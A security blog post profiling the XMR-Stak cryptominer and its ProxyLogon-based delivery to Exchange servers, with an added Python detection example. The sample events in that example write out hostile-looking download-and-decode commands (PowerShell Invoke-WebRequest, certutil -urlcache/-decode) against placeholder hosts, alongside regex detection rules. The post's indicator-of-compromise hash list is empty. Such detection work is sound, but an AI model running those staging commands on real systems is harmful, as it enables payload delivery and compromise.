XMR-Stak – Cryptocurrency Miner

Discovered in March 2021, XMR-Stak is a cryptomining trojan that targets vulnerable Microsoft Exchange Server systems using a ProxyLogon exploit. Compromised email systems are used both to mine new currency and to host payloads for new infections.

XMR-Stak is described as being a universal Stratum pool miner. The miner supports CPUs and AMD and NVIDIA GPUs, and can be used to mine the cryptocurrencies Monero, Aeon and many other Cryptonight coins.

Vulnerable Microsoft Exchange servers are initially accessed using a PowerShell command that downloads a ZIP archive file from a previously compromised server’s Outlook Web Access path. This file is not a legitimate archive but a batch script which, when executed, invokes certutil.exe to download and decode two further spoofed ZIP archives.

The first of these files is another batch script, which decodes the second file (containing the miner and its configuration data) before injecting it into a running process. If successful, the script then deletes both itself and the other ZIP archives, leaving only the running mining process.
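The delivery chain described above (a PowerShell fetch from an OWA path, then certutil.exe used to download and decode the staged files) leaves process-creation telemetry that can be matched with a few simple heuristics. The following is an added detection example, not code from the original post: it runs three rules over constructed event lines loosely modelled on Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the hostnames, paths and command lines are hypothetical sample data.

```python
import re

# Constructed sample process-creation events (hypothetical hosts, paths and
# command lines), loosely modelled on Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Windows\System32\inetsrv\w3wp.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell -c Invoke-WebRequest 'http://mail.example.test/owa/auth/update.zip' -OutFile C:\Windows\Temp\update.zip",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\certutil.exe"
    r"|CommandLine=certutil -urlcache -split -f http://mail.example.test/owa/auth/a.zip C:\Windows\Temp\a.zip",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\certutil.exe"
    r"|CommandLine=certutil -decode C:\Windows\Temp\a.zip C:\Windows\Temp\a.bat",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\certutil.exe"
    r"|CommandLine=certutil -verify C:\certs\server.cer",  # benign certutil use, must not alert
    r"ParentImage=C:\Windows\System32\services.exe|Image=C:\Windows\System32\svchost.exe"
    r"|CommandLine=svchost.exe -k netsvcs",
]

WEB_WORKER = re.compile(r"\\w3wp\.exe$", re.IGNORECASE)              # IIS worker that hosts Exchange/OWA
SHELLS = re.compile(r"\\(powershell|pwsh|cmd)\.exe$", re.IGNORECASE)
CERTUTIL_ABUSE = re.compile(r"-(urlcache|decode)\b", re.IGNORECASE)  # download / decode switches
OWA_ZIP = re.compile(r"https?://[^\s'\"]+/owa/[^\s'\"]*\.zip", re.IGNORECASE)


def parse_event(line: str) -> dict:
    """Split 'Key=Value|Key=Value' into a dict, splitting each part on its first '=' only."""
    return dict(part.partition("=")[::2] for part in line.split("|"))


def evaluate(fields: dict) -> list:
    """Return the names of every heuristic the event matches."""
    parent = fields.get("ParentImage", "")
    image = fields.get("Image", "")
    cmd = fields.get("CommandLine", "")
    hits = []
    if WEB_WORKER.search(parent) and SHELLS.search(image):
        hits.append("exchange_worker_spawns_shell")  # shell spawned by the OWA worker process
    if image.lower().endswith("\\certutil.exe") and CERTUTIL_ABUSE.search(cmd):
        hits.append("certutil_download_or_decode")   # certutil used as downloader or decoder
    if OWA_ZIP.search(cmd):
        hits.append("zip_fetched_from_owa_path")     # payload staged on a compromised OWA path
    return hits


def scan(lines) -> list:
    """Run the heuristics over each event; returns (line number, rule name) pairs."""
    return [(n, rule) for n, line in enumerate(lines, start=1)
            for rule in evaluate(parse_event(line))]
```

Against the sample events, the first three lines trigger five findings between them and the two benign lines trigger none; in a real deployment the field extraction would be replaced by your SIEM's parser and the rules tuned against the normal certutil usage in your estate.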

XMR-Stak configuration data states that it will only begin mining if it can create a TLS connection to the attacker’s Monero wallet.

If you're unsure what cryptocurrency is and how it works, we suggest you read up on it; there are lots of good books out there, for example Cryptocurrency Investing For Dummies or Bitcoin For Dummies. We have found that the “For Dummies” range of books offers a great start to any subject area you're unsure about.

Indicators of compromise

SHA256 hashes


Duncan Newell

Duncan is a technology professional with over 20 years' experience of working in various IT roles. He has an interest in cyber security, and has a wide range of other skills in radio, electronics and telecommunications.
